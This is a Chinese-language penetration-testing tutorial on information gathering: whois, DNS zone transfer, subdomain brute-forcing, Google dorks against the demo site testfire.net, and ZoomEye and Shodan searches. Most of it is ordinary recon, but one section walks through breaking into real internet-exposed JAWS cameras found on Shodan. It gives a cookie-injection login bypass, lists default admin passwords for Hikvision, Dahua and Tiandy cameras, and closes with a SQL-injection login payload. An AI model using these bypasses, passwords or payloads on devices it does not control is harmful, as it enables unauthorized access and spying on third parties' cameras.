信息收集

在划定了测试范围之后,就需要进入信息收集阶段.在这个阶段,渗透人员需要使用各种公开资源尽可能地获取测试目标的相关信息

  • 论坛
  • 公告板
  • 新闻组
  • 媒体文章
  • 博客
  • 社交网络
  • 其他商业或非商业性的网站
  • github

此外,他们也可以借助各种搜索引擎中获取相关数据,如谷歌,雅虎,MSN必应,百度等.收集的信息主要包括DNS 服务器,路由关系,whois 数据库,电子邮件地址,电话号码,个人信息以及用户账户.收集的信息越多,渗透测试成功的概率越高.testfire.net是IBM公司为了演示旗下比较有名的Web 漏洞扫描器AppScan 的强大功能所搭建的模拟银行网站,所以上面会有很多常见的Web安全漏洞

DNS信息

在收集DNS 信息的时候,主要关注域名注册商,管理员联系方式,电话和邮箱,子域名等信息.

whois查询

whois是一个集成在kali中的小工具,可以用来查询域名注册信息

whois 1997sty.com

QQ截图20201209093201.png

站长之家whois查询

QQ截图20201209093551.png

子域名查询

可以查询子域名的网站,如果打不开需要使用VPN.在表单中直接提交域名即可,这种方法查询大型网站比较有优势.

QQ截图20201209094011.png

域传送漏洞

#可以使用kali中dig工具来检测域传送漏洞
#发送axfr类型的dns请求 如果存在漏洞就会获取到所有子域名的解析记录
dig @10.0.0.254 -t axfr vulhub.org

QQ截图20201209105221.png

dnsrecon子域名爆破

准备一个字典里面写上所有可能的域名.字典中的每个单词,依次去尝试

dnsrecon -d baidu.com -D /root/dns.dic -t brt

QQ截图20201209101842.png

DNS2IP

#ping
ping www.baidu.com
#nslookup
nslookup www.baidu.com
#dnsenum
#推荐使用dnsenum,此款工具在解析域名的时候,会自动检测域传送漏洞
dnsenum www.baidu.com

QQ截图20201209105520.png

CDN加速的问题

CDN是内容分发网络本意是进行节点缓存,使网站访问速度加快.一般情况下是没办法得到目标网站的真实IP 的.CDN加速获取真实ip可以参考以下资料

IP查询

站长之家ip查询

站长之家同IP网站查询

查询IP地址经纬度

QQ截图20201209112253.png

利用搜索引擎搜集信息

google

google机器人,爬行全世界所有网站的内容.google hacker就是利用搜索引擎语法,获取有关网站的信息.

  • www.google.com
  • site : 指定网站
  • "" : 包含关键字
  • inurl : 在url中出现的关键字
  • filetype : 指定文件类型
#探索网站目录结构
site:testfire.net "parent directory"
#搜索容易存在sql注入的页面
site:testfire.net inurl:login
#搜索指定的文件类型
filetype pdf
#搜索phpinfo()
intext:"PHP Version " ext:php intext:"disabled" intext:"Build Date" intext:"System" intext:"allow_url_fopen"
#搜索PHPstudy
intitle:"php中文网 探针2014"

QQ截图20201209141340.png

QQ截图20201209141358.png

QQ截图20201209141533.png

QQ截图20201209141746.png

钟馗之眼

ZoomEye 支持公网设备指纹检索和 Web 指纹检索.网站指纹包括应用名,版本,前端框架,后端框架,服务端语言,服务器操作系统,网站容器,内容管理系统和数据

QQ截图20201209135745.png

shodan

Shodan是一个搜索引擎,它使用户可以使用各种过滤器查找连接到Internet的特定类型的计算机(网络摄像头,路由器,服务器等).有人还将其描述为服务标语的搜索引擎,服务标语是服务器发送回客户端的元数据.这可以是有关服务器软件,服务支持哪些选项,欢迎消息或客户端在与服务器进行交互之前可以找到的其他信息的信息.

使用shodan破解摄像头实战

  • 利用shodan搜索JAWS/1.1

QQ截图20201209142029.png

  • 入侵网络摄像头方式
  1. 空口令登入,点击第一条连接,即可进入登录页面
  2. 登录绕过,在控制台中输入以下JS 代码,然后直接访问/view2.html,即可绕过登录验证进入控制台
document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

QQ截图20201209151906.png

QQ截图20201209151841.png

其他摄像头默认账密

  • Hikvision海康威视IP网络摄像机admin,密码:12345
  • Server:DVRDVS-Webs大华网络摄像机 admin,密码:888888
  • 天地伟业网络摄像机Admin,密码:111111

SQL注入攻击

#用户名和密码均使用以下参数登录
1' or '1'='1

QQ截图20201209152710.png

QQ截图20201209152716.png

其他参考资料